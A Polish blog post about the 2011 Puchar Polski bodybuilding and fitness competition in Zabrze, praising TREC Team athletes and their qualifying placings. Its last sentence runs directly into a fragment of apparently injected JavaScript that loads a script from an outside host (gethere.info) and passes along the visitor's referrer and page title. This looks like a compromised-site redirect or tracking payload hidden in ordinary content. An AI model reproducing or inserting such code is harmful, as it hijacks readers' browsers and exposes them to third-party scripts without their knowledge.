PUCHAR POLSKI 2011

26.10.2011 / Adam Jabłoński / Kulturystyka

Cześć,

W ubiegły weekend 22-23.10.2011 w Zabrzu rozegrały się Mistrzostwa Polski Juniorów i Weteranów w Kulturystyce i Fitness oraz [b]Międzynarodowy Puchar Polski[/b] zawody odbyły się w hali MOSiR.

Znając mniej więcej obsadę nie mogłem przepuścić okazji aby zobaczyć tak wielu najlepszych zawodników startujących razem w tym kolegów z TREC Team’u Tomasza Lecha (PaPaja), Przemka Żokowskiego (Definicje) i zawodniczek.

Razem z Przemkiem (Olympi-S) wyruszyliśmy po zamknięciu naszych sklepów w Sobotę do Zabrza, a celem był Puchar Polski.
Podróż ze Szczecina do hotelu w Zabrzu zajęła parę godzin, a dojechaliśmy na miejsce około 22:30 -23:00 .
Rano po śniadaniu pojechaliśmy na hale była godzina 12, a rozgrywane były jeszcze Mistrzostwa Polski  Weteranów w Kulturystyce i Fitness.

Na Hali było już w miarę ciepło, choć zawodnicy w slipkach mogli mieć inne zadanie.

Hala była podzielona na 2 sektory na 1 Sektorze ustawiona była scena, miejsca dla sędziów oraz dla media.
Za sceną znajdywał się namiot w którym za opłatą zawodnicy mogli profesjonalnie wysmarowani. Natomiast 2 sektor składał się ze stoisk gdzie wystawcy mogli zaprezentować swoje artykuły, właśnie tam najwięcej można było spotkać ludzi powiązanych z branżą kulturystyczno-sportową.

Właśnie na 2 sektorze spędziłem trochę czasu razem z Przemkiem (Olympia-S) i Tomkiem Lechem, Tomek był trochę zmęczony i poddenerwowany jednak humor ciągle się go trzymał., w między czasie spotkałem Przemka Żokowskiego ” Definicje”.

Przed Pucharem Tomek z Definicja poszli odpoczywać:

a my razem z Przemkiem poszliśmy na trybuny zająć miejsca bo ludzi było coraz więcej.

1 rundy oglądaliśmy z trybun :

Gdy skończyła się pierwsza runda zeszliśmy do startujących na dół, leżeli zmęczeni ale już zadowoleni

Tomek przed każdym wyjściem na scenę zapodawał S.A.W. -a i Vitargo, to był mega widok jak u Tomka z minuty na minute żyły zaczynały wychodzić coraz większe, a mięśnie stawały się bardziej pękate.

Podczas drugiej rundy tym razem pod scena udało się mi zrobić dużo zdjęć.

Pod sceną wszystko było widać idealnie i śmiało mogę stwierdzić, że był to bardzo wysoki poziom zawodów, Papaj który jak mówi nie miał 100% formy wyglądał bardzo dobrze, tak samo Definicja choć jego celem nie był Puchar Polski prezentował sie bardzo dobrze, za co dostał 4 miejsce.

TAKŻE CHŁOPAKI Z TREC TEAM -u Zaprezentowali na prawdę świetną formę i tak :

w Kulturystyce : Tomasz Lech ” PAPAJ ”  zajął 3 miejsce – kwalifikując się  do wyjazdu na Mistrzostwa Świata w kulturystyce które odbędą się w Mumbai w  Indiach

w Kulturystyce Klasycznej : Przemysław Żokowski ” DEFINICJA ” zajął 4 miejsce – również ma kwalifikacje aby pojechać na Mistrzostwa Świata w kulturystyce klasycznej które odbędą się w  Tallin w Estonii

Jestem dumny, że chłopaki będą godnie reprezentować POLSKĘ oraz TREC Team !!!!!!!

Fitnesski, kulturystki wszystkie reprezentowały doskonały poziom :

Po 2 rundzie i układach dowolnych – wszyscy sobie gratulowali.
Po gratulacjach zrobiłem kilka fotek z zawodnikami i zawodniczkami :

Po zdjęciach, pożegnałem się z Papajem i Definicją bo razem z Przemkiem musieliśmy już wracać.

Podsumowując, zawody były na bardzo wysokich poziomie dużo znanych postaci, Hala duża, z tym, że zawodnicy powinni mieć jakaś jedną ciepłą salę, żeby poleżeć przed wyjściem na scene.

Teraz tylko czekać co nasi zawodnicy pokażą na Mistrzostwach Świata.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”;